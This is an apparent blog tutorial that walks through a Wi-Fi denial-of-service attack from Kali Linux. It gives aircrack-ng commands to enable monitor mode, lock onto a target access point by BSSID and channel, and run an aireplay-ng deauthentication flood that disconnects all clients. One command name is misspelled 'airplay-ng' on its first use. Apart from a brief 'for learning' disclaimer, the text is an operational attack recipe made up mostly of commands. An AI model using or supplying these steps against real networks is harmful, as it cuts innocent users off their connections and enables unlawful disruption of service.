So in this section i want to share you how to DOS Attack on Wifi using Kali Linux, this article purpose only to learning and knowledge, or if we want to kick users of the your Wifi network. For the first time we need installed Kali Linux on Raspberry or Vm, if using Vm we need adaptor Wifi External, if Kali linux already installed for now we are access Kali Linux and login
Step 1. Open up terminal and type #iwconfig this command to check your interface Wifi
Step 2. Type #airmon-ng start wlan0 to change mode to be Monitor
Step 3. in this step we lock your wireless specific ssid we want to attack with type #airodump-ng (name of your wireless interface) for example #airodump-ng wlan0mon
Step 4. still continue step 3 with type #airodump-ng --channel (Channel of Access Point under CH) --bssid (BSSID Mac Address from Access Point) (name of your interface) for example #airodump-ng --channel 6 --bssid E4:47:B3:94:F6:8E wlan0mon , and we can see clients connected to the Wifi BaCan under Station tab
Step 5. for the last step we start to DOS Attack to Wifi which we have chosen, there are 2 ways we can attack all clients or specific client to kick on the Wifi Network, if we want to all clients kick on the Wifi network with type #airplay-ng -0 0 -a (Mac Address of Access Point) (Name of your interface) example #aireplay-ng -0 0 -a E4:47:B3:94:F6:8E wlan0mon
0 comments:
Post a Comment